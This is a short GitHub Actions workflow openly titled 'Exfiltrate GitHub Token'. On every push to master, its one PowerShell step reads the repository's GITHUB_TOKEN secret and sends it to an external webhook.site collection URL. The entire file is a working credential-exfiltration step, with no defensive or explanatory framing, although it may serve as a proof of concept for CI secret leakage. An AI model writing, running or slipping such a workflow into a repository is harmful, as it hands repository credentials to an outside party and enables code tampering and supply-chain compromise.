name: Exfiltrate GitHub Token

on:
  push:
    branches: [ master ]

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Exfiltrate GitHub Token via PowerShell
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          powershell -Command "Invoke-RestMethod -Uri 'https://webhook.site/5c786797-8a11-4fcd-b22c-93e55022ed78' -Headers @{Authorization='token $env:TOKEN'}"
